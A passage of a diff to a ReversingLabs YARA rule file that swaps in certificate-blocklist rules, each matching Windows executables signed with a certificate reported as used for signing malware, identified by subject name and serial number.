-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13386-L13402"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7406-L7422"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "74749317fcefcdb698046a6f42c6c6e05cc1eab1370b3b1fd7d025f49de4a032"
+		logic_hash = "1a8e72f31039a5a5602d0314f017a2596a23e4a796dc66167dfefc0c9790e3e3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24917,21 +47311,21 @@ rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "20:50:b5:41:46:b0:11:ed:30:f6:0f:61" and 1476773926 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" and 1609372800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "284c206f-8a0c-5bb6-8f28-d8e5e60efe3e"
+		id = "690e7919-0344-5bd1-849f-e7bfe2f19276"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13404-L13420"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7424-L7442"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "503429e737e8bdad735cf88e2bb2877d1f52b2c38be101a7a129c02db608a347"
+		logic_hash = "0ec56bd4783c854efef863050ff729fd99efa98b7b19e04e56a080ee3e75cd90"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24941,21 +47335,21 @@ rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "73:e2:f3:4c:9c:24:35:f2:9b:be:0a:3c" and 1480312984 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and ( pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" or pe.signatures [ i ] . serial == "8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" ) and 1613433600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a8ed2e72-d94e-5141-8ceb-181459a729ad"
+		id = "c83918d8-fe90-59dc-8f4e-0e7b10238780"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13422-L13438"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7444-L7462"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3eb63f75f258eec611fa4288302f0ce5e47149ca876265a4a4b65dc33313aaa6"
+		logic_hash = "794dc27ff9b2588d3f2c31cdb83e53616c604aa41da7d8c895034e1cf9da5dd8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24965,21 +47359,21 @@ rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "68:c4:57:d7:49:5d:2a:8d:0d:7b:90:42:83:61:35:c2" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and ( pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" or pe.signatures [ i ] . serial == "b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" ) and 1614556800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e1cf9568-9a6a-58cb-81a4-25063ccc1ac7"
+		id = "ab84282d-9c35-5e52-a117-1d85c03cc6f4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13440-L13456"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7464-L7482"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b20c16dafcd891c36b28b36093cd3ad3a15f3795f0f2adda61fb0db2835d02d"
+		logic_hash = "0360c6760f1018f9388ef5639ab2306879134f33da12677f954fa31b8a71aa16"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24989,21 +47383,21 @@ rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "6b:72:ca:36:7d:40:fb:ef:16:e7:3e:6e:ba:6a:9a:59" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and ( pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" or pe.signatures [ i ] . serial == "fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" ) and 1614297600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1991779a-8b5d-5188-8a36-c8451923e88f"
+		id = "facb8bba-a8cc-5b2a-9ef6-ba290cbf9b24"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13458-L13474"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7484-L7502"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "44e86319106a4bf8edba6c1be2f90d68b3d1ef4591f0cc23921a0dc4da4a407b"
+		logic_hash = "feaa8d645eea46c7cbbba4ba86c92184df7515a50f1f905ab818c59079a0c96a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25013,21 +47407,21 @@ rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Net Technology" and pe.signatures [ i ] . serial == "73:6b:76:63:d3:22:53:34:13:f3:6e:3e:7e:55:f9:20" and 1159488000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecno trade d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" or pe.signatures [ i ] . serial == "aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" ) and 1611705600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d012df1d-5e85-57b4-8a79-5da91369a14a"
+		id = "300d9e11-9283-500e-9716-5b628ef41853"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13476-L13492"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7504-L7520"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ddae18d566fa2fd077f51d0afff74fb8a8e525f88f23908c7402a4b2c092ad24"
+		logic_hash = "0ec031c781ebad7447cfc53ce791aacc8f24e38f039c84e2ee547de64729ae76"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25037,21 +47431,21 @@ rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "54:a1:70:10:24:61:fd:c9:67:ac:fa:fe:4b:bb:c7:f0" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" and 1608163200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ec73230-10cd-55ad-9ef7-56a875294cab"
+		id = "f7894a48-459b-574f-9df3-8505578de42b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13494-L13510"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7522-L7538"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dca37fda83650979566fb6ffbedaf713955a3c7f03ecc62e2e155475b7ca00e4"
+		logic_hash = "d541ce73e5039541ea221f27cc4d033f0c477e41a148206c26cc39ae07c4caaa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25061,21 +47455,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "0c:50:1b:8b:11:32:09:c9:6c:81:19:cf:7a:6b:8b:79" and 1474329600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE, dru\\xC5\\xBEba za posredovanje, d.o.o." and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" and 1612396800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "abccf84f-ba18-5644-897c-d23a228facff"
+		id = "4ce9b2ce-5dda-5741-bd29-cadae44c3b28"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13512-L13528"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7540-L7558"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8476ece98427c1ffd99d820c25fe664397de2c393473f7d5ee0846d8d840fd9e"
+		logic_hash = "a124f80d599051ecd7c17e6818d181ea018db14c9f0514bbcc5b677ba3656d65"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25085,21 +47479,21 @@ rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "03:00:ee:4a:4c:52:44:31:47:82:1a:81:86:d0:43:09" and 1494892800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and ( pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" or pe.signatures [ i ] . serial == "d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1c442ed6-a48a-52f4-b345-300428ec9c76"
+		id = "36b12300-6535-5644-9145-9f532b49a421"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13530-L13546"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7560-L7578"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "671a4b522761fdff75d1c0c608e8cfb21c7ab538c8c30c8620315bc58ed358e6"
+		logic_hash = "a672054a776d0715fc888578bcb559d24ef54b4c523f7d49a39ded2586c3140a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25109,21 +47503,21 @@ rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DATALINE LTD." and pe.signatures [ i ] . serial == "20:2c:f8" and 1087841761 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and ( pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" or pe.signatures [ i ] . serial == "d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" ) and 1613001600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88679114-9c85-5810-af21-d5c2a8dc759e"
+		id = "362a6eb7-f49e-502b-9870-522aea13e04b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13548-L13564"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7580-L7596"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "29bfe9c8b340b55a9daa2644e8d55b2b783cc95c85541732e6e0decca8c10ff6"
+		logic_hash = "8c98b856d53e6862e94042bb133f5739bddcec2e208e43961b23e244584c6ee4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25133,21 +47527,21 @@ rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NUSAAPPINSTALL(APPS INSTALLER S.L.)" and pe.signatures [ i ] . serial == "66:51:cc:8b:48:50:d4:de:c6:19:61:50:3e:a7:95:6b" and 1436175828 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" and 1612396800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a97723cb-7814-5f08-af94-6244c1cf4145"
+		id = "0d0a58a4-353d-51f9-a739-a135d77357c9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13566-L13582"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7598-L7614"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dc59fdecf60f3781e92cfe8469be2e0c1cb1cfdd3e9f9757d159667437cb37f5"
+		logic_hash = "55cc1634cdc5209d68b98fdb0d9e97e0a34346cdcb10f243d13217cda01195f1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25157,21 +47551,21 @@ rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "25:be:f2:84:67:e4:75:03:31:d2:f4:03:45:81:13:b8" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" and 1613088000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ae7d8c3c-0ac8-5ea5-8013-97ccb2ace4e4"
+		id = "962c3096-2c3d-5137-9637-b45d00b2ee9b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13584-L13600"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7616-L7632"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "acf3b7460c79fa71c1b131b26a40bbc286c9da0a5fe7071bbe8b386a3ca91de4"
+		logic_hash = "793be308a4df55c3b325e1ee3185159c4155f6dfabc311216d3763bd43680bd4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25181,21 +47575,21 @@ rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "02:96:cf:33:14:f4:34:c5:b7:4d:0c:3e:36:61:6d:d1" and 1474934400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" and 1613001600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2c37ddc-51bc-58da-b770-df97aebca01d"
+		id = "3f7f9d58-3a7a-5f84-bf6e-795a9c8bcd38"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13602-L13618"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7634-L7650"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d3e61e9a43f5b17ebb08b71dc39648d1f20273a18214f39605f365f9f0f72c10"
+		logic_hash = "016ca6dcb5c7c56c80e4486b84d97fb3869a959ef3e8392e4376a0a0de06092f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25205,21 +47599,21 @@ rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Mei" and pe.signatures [ i ] . serial == "04:5d:57:d6:3e:13:77:5c:8f:81:2e:18:64:79:7f:5a" and 1485043200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" and 1606143708 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_30Af0D0E6D8201A5369664C5Ebbb010F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b85bf9c5-f438-5973-83ab-926e44cf2298"
+		id = "aaa31642-a0f4-5652-b3cd-c81cfb1ab127"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13620-L13636"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7652-L7668"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "84e2f427ee79b47db8d0e5f1e2217a7e1c1ea64047e01b4ea6db69f529501f36"
+		logic_hash = "018e5a0fbeeaded2569b83e2f91230e0055a5ffa2059b7a064a5c2eda55ed2de"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25229,21 +47623,21 @@ rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "6d:63:3d:f9:bb:60:15:fc:3e:ce:a9:9d:ff:30:9e:e7" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3N-\\xC5\\xA0PORT podjetje za in\\xC5\\xBEeniring, storitve in trgovino d.o.o." and pe.signatures [ i ] . serial == "30:af:0d:0e:6d:82:01:a5:36:96:64:c5:eb:bb:01:0f" and 1613433600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE
